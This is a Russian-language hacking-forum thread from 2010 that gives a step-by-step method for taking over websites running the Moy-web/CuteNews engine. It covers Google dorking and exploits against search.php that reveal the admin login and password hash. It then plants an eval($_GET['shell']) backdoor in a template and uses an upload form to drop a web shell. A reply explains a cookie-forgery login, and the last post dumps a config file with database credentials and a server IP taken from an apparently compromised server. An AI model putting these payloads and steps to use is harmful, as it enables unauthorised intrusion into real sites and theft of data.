Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

Взлом сайта на Moy-web

-

Баги и читы Lineage 2

- Уязвимости, баги и читы для Lineage 2 в этом разделе

Ответ
 
Опции темы
Старый 28.03.2010, 22:44   #1
Заблокирован
 Сержант
Аватар для OveRKinG
 
OveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауру
Регистрация: 15.12.2009
Сообщений: 152
Популярность: 537
Сказал(а) спасибо: 158
Поблагодарили 215 раз(а) в 91 сообщениях
Отправить сообщение для OveRKinG с помощью ICQ
 
По умолчанию Взлом сайта на Moy-web

Заходим в админку

1. Поиск в гуглом:
© Project -= Moy-weB =-


2. После того как погуглили идем на целевой сайт и заходим в директорию /news/ если есть, то хорошо, если нет гуглим дальше.
Так же обязателен файл /news/search.php

3. Дальше используем сплоит для поиска админа
Код:
$target = 'http://localhost/cutenews.1.4.5/search.php';  здесь указываем путь к файлу search.php.
3. Следующим шагом будет использование сплоита для поиска MD5 хэша админа.
$target = 'http://localhost/cutenews.1.4.5/search.php'; Путь к файлу search.php
$username = 'waraxe'; Ник админа (получен с помощью первого сплоита).

Если не хотите использовать сплоиты, вы можете восплользоваться этим сайтом

4. Расшифровываем хэш. И идем в админку сайта - /news/

Заливаем шелл

1. Идем в Настройки - Редактировать шаблоны - Активные новости

2. Видим текстовое поле. Туда пишем:
Код:
HTML;
if(isset($_GET['shell'])) eval($_GET['shell']);

3. Далее проверяем news/show_news.php?shell=phpinfo();
Должна появиться информация о PHP. Приступаем к заливке шелла.

4. Создаем файл HTML :
Код:
<form action=http://site.com/news/show_news.php?shell=copy($_FILES[file][tmp_name],$_GET[aa]);&aa="локальный путь сайта"\news\shell.php 
method=post enctype=multipart/form-data> 
<input type=file name=file><br> 
<input type=submit value=Загрузить><br> 
</form>

5. Радуемся шеллу по адресу - [Ссылки могут видеть только зарегистрированные пользователи. ]

P.S. Данные для подключения к БД находятся в /config/config.php

Автор MERRON ©.Взято с xaker.ru
Буду не против благодарностей.
Флудерам тут не место.
  Ответить с цитированием
5 пользователя(ей) сказали cпасибо:
botko (29.03.2010), GraNIT (28.03.2010), jekajkee (12.04.2010), mucerato (28.03.2010), Федя (29.03.2010)
Старый 28.03.2010, 22:45   #2
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

Хочу лишь сказать что Moy-Web крайне редкий двиг, и способ этот выложен.. мм

26.11.2008, 01:34
на nulled.ws
  Ответить с цитированием
Старый 29.03.2010, 02:18   #3
 Пехотинец
Аватар для fuzzion
 
fuzzion на правильном пути
Регистрация: 08.02.2010
Сообщений: 62
Популярность: 52
Сказал(а) спасибо: 21
Поблагодарили 21 раз(а) в 13 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

советую юзать этот сайт для нахождения логина админа.

_http://game-zone.pp.ru/cuteuser.php
  Ответить с цитированием
Старый 29.03.2010, 13:10   #4
 Разведчик
Аватар для bool
 
bool на правильном пути
Регистрация: 27.11.2009
Сообщений: 15
Популярность: 54
Сказал(а) спасибо: 11
Поблагодарили 22 раз(а) в 10 сообщениях
 
Post Re: Взлом сайта на Moy-web

"Локальны путь сайта" где это взять?
________________
Сливаю хайды с АЧ за что нить интересное)
  Ответить с цитированием
Старый 29.03.2010, 13:12   #5
Заблокирован
 Сержант
Аватар для OveRKinG
 
OveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауруOveRKinG излучает ауру
Регистрация: 15.12.2009
Сообщений: 152
Популярность: 537
Сказал(а) спасибо: 158
Поблагодарили 215 раз(а) в 91 сообщениях
Отправить сообщение для OveRKinG с помощью ICQ
 
По умолчанию Re: Взлом сайта на Moy-web

Ну это как тебе сказать вот к примеру жук как должен выглядить поиск:
http://zhyk.ru/cutenews.1.4.5/search.php
Подставляеш под локалхост имя сайта.
Вот тот же пример:
[Ссылки могут видеть только зарегистрированные пользователи. ]
Под сайт.ком подставляй свое и будет тебе счастье.
  Ответить с цитированием
Старый 05.04.2010, 02:14   #6
 Разведчик
Аватар для MERRON
 
MERRON на правильном пути
Регистрация: 05.04.2010
Сообщений: 22
Популярность: 24
Сказал(а) спасибо: 4
Поблагодарили 7 раз(а) в 5 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

Под термином "Локальный путь" я имел в виду, что-то типа
/home/site.ru/www/news/data/ (Linux система).

Способ старый - это да. Но я нигде не видел нормального способа залива шелла.
  Ответить с цитированием
Старый 11.04.2010, 22:19   #7
 Разведчик
Аватар для 387
 
387 на правильном пути
Регистрация: 08.01.2010
Сообщений: 4
Популярность: 42
Сказал(а) спасибо: 2
Поблагодарили 16 раз(а) в 12 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

Это обычный скрипткидинг, читайте багтраки и узайте норм уязвимости по шопам, у меня когда занимался вскими подобными гадостями было неск к баз кред.
Но на самом деле быстро надоедает, да и вырастаешь.
________________
рождённый в прошлом тысячелетии, в городе и стране, которых уже нет...
  Ответить с цитированием
Старый 11.04.2010, 22:32   #8
 Разведчик
Аватар для langes
 
langes на правильном пути
Регистрация: 30.09.2009
Сообщений: 26
Популярность: 84
Сказал(а) спасибо: 45
Поблагодарили 24 раз(а) в 12 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

куда эксплоит вписывать?(:
  Ответить с цитированием
Старый 12.04.2010, 00:54   #9
 Разведчик
Аватар для rinox
 
rinox неизвестен в этих краяхrinox неизвестен в этих краяхrinox неизвестен в этих краях
Регистрация: 15.01.2010
Сообщений: 2
Популярность: -205
Сказал(а) спасибо: 0
Поблагодарили 0 раз(а) в 0 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

кто может расшифровать хэш плиз? b54d8c4279b82b67b746755a84b76743

Добавлено через 28 минут
заюзал все онлайн декрипторы отсюда ht_tp://forum.antichat.ru/thread11028.html не помогло

на всех онлайнках пишет типо хэш не найден в нашей базе

Последний раз редактировалось rinox; 12.04.2010 в 01:22. Причина: Добавлено сообщение
  Ответить с цитированием
Старый 12.04.2010, 13:10   #10
 Разведчик
Аватар для Xacan
 
Xacan никому не известный тип
Регистрация: 07.03.2010
Сообщений: 11
Популярность: 14
Сказал(а) спасибо: 0
Поблагодарили 2 раз(а) в 1 сообщении
Отправить сообщение для Xacan с помощью ICQ
 
По умолчанию Re: Взлом сайта на Moy-web

Цитата:
Сообщение от rinoxПосмотреть сообщение
кто может расшифровать хэш плиз? b54d8c4279b82b67b746755a84b76743

Откуда взят хеш?
________________
• Debugged programm was unable to process exception. Terminating...
  Ответить с цитированием
Старый 12.04.2010, 13:19   #11
༼ ᕤ◕◡◕ ༽ᕤ
 Капитан
Аватар для Chipito
 
Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(Chipito сломал счётчик популярности :(
Регистрация: 09.12.2009
Сообщений: 256
Популярность: 20088
Золото Zhyk.Ru: 1
Сказал(а) спасибо: 181
Поблагодарили 681 раз(а) в 251 сообщениях
Отправить сообщение для Chipito с помощью ICQ
 
По умолчанию Re: Взлом сайта на Moy-web

Для того чтоб не расшифровывать хеш и зайти в админку используй мануал:
Скачиваем:
Firefox
Плагин Cookies Editor для Firefox


1. Находим сайт на движке moy-web. Удобно искать запросами, которые я написал выше.
2. После того, как нашли сайт, ищем файл search.php по адресу .../news/search.php
3. Если файл там есть, значит приступаем к следующему действию, если файла нет, переходим к пункту 1.
4. Теперь нам надо узнать логин админа, для этого переходим сюда и вводим полный путь к search.php
5. Получили логин админа и теперь узнаем хэш админа, для этого переходим сюда и вводим Логин (у меня root) и путь к файлу search.php
6. Получаем хэш админа. (у меня ec361eff84f3ef4d75214585da176f5e)

Устанавливаем Firefox и плагин для него.
Дальше идем Инструменты=>Редактор Cookies=>Добавить
Заполняем:
1. Имя=>username
2. Содержимое=>Логин администратора (у меня root)
3. Узел=> путь к сайту (БЕЗ HTTP:// напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Жмем сохранить.. Сохранили и добавляем еще 1 кук. Жмем добавить:
1. Имя=>md5_password
2. Содержимое=>Хэш (у меня ec361eff84f3ef4d75214585da176f5e)
3. Узел=> путь к сайту (БЕЗ [Ссылки могут видеть только зарегистрированные пользователи. ] напр. [Ссылки могут видеть только зарегистрированные пользователи. ])
4. Путь=>Путь к админке (у меня /news/)
Сохраняем… Теперь идем в админку… Воаля, вы залогинены)))
(С)Netprostor
  Ответить с цитированием
Старый 12.04.2010, 17:43   #12
 Разведчик
Аватар для mrdemon
 
mrdemon никому не известный тип
Регистрация: 21.03.2010
Сообщений: 10
Популярность: 16
Сказал(а) спасибо: 2
Поблагодарили 3 раз(а) в 2 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

Этим способом можно издеваться над зарубежными? или только мой веб?
  Ответить с цитированием
Старый 12.04.2010, 17:49   #13
Заблокирован
 Капитан
Аватар для Underwhy
 
Underwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слухуUnderwhy у всех на слуху
Регистрация: 22.08.2009
Сообщений: 277
Популярность: 1328
Сказал(а) спасибо: 194
Поблагодарили 472 раз(а) в 220 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

Цитата:
Сообщение от mrdemonПосмотреть сообщение
Этим способом можно издеваться над зарубежными? или только мой веб?

Способ можно применить везде где стоит админка cute news
  Ответить с цитированием
Старый 18.04.2010, 16:03   #14
 Разведчик
Аватар для langes
 
langes на правильном пути
Регистрация: 30.09.2009
Сообщений: 26
Популярность: 84
Сказал(а) спасибо: 45
Поблагодарили 24 раз(а) в 12 сообщениях
 
По умолчанию Re: Взлом сайта на Moy-web

Зачем расшифровывать хеш?используйте плагин к лисе и будет вам счастье)
  Ответить с цитированием
Старый 18.04.2010, 18:46   #15
 Сержант
Аватар для IncubusX
 
IncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауруIncubusX излучает ауру
Регистрация: 04.03.2010
Сообщений: 117
Популярность: 604
Сказал(а) спасибо: 213
Поблагодарили 111 раз(а) в 47 сообщениях
Отправить сообщение для IncubusX с помощью ICQ
 
По умолчанию Re: Взлом сайта на Moy-web

Код:
$L2JBS_config["mysql_host"]="localhost";    // IP адрес MySQL-сервера     ["localhost"]
$L2JBS_config["mysql_port"]="3306";        // Порт              ["3306"]
$L2JBS_config["mysql_db"]="l2rt";        // Имя игровой базы         ["l2jdb"]
$L2JBS_config["mysql_login"]="root";        // Логин             ["root"]    
$L2JBS_config["mysql_password"]="root";        // Пароль            ["root"]
$htitle="L2tusovka";                // Титул сайта
$fut="© Lineage-II [Ссылки могут видеть только зарегистрированные пользователи. ] 2010";        // Подпись в низу сайта
$top="50";                    // Количество игроков в списке ТОП
$hserver="81.200.81.145";            // IP адрес сервера
$portgame="7777";                // Порт игрового сервера
$portlogin="9014";                // Порт логин сервера
Однако база даже не создана, всего на сервере 4 служебных базы.
ЗЫ Зато приличный дедик, жаль домашний комп всего лишь..
Код:
Провайдер      Center of Children Telemedicin and new information
Входящая скорость     2.37 Mбит/сек
Исходящая скорость     5.55 Mбит/сек
Пинг     56.272 мсек
Добавлено через 3 часа 34 минуты
[Ссылки могут видеть только зарегистрированные пользователи. ]
[Ссылки могут видеть только зарегистрированные пользователи. ]

Ещё 2 шелла 1 линь, другой Вин7

Последний раз редактировалось IncubusX; 18.04.2010 в 22:21. Причина: Добавлено сообщение
  Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Взлом сайта на stressweb 8.0+ ~Nero~ Общение и обсуждение, архив Lineage 2 4 24.03.2010 01:09
Видео Взлом сайта Joomla 1.5.12 + заливка шела pareHbry6axa Баги и читы Lineage 2 3 11.01.2010 15:47

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 22:46.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net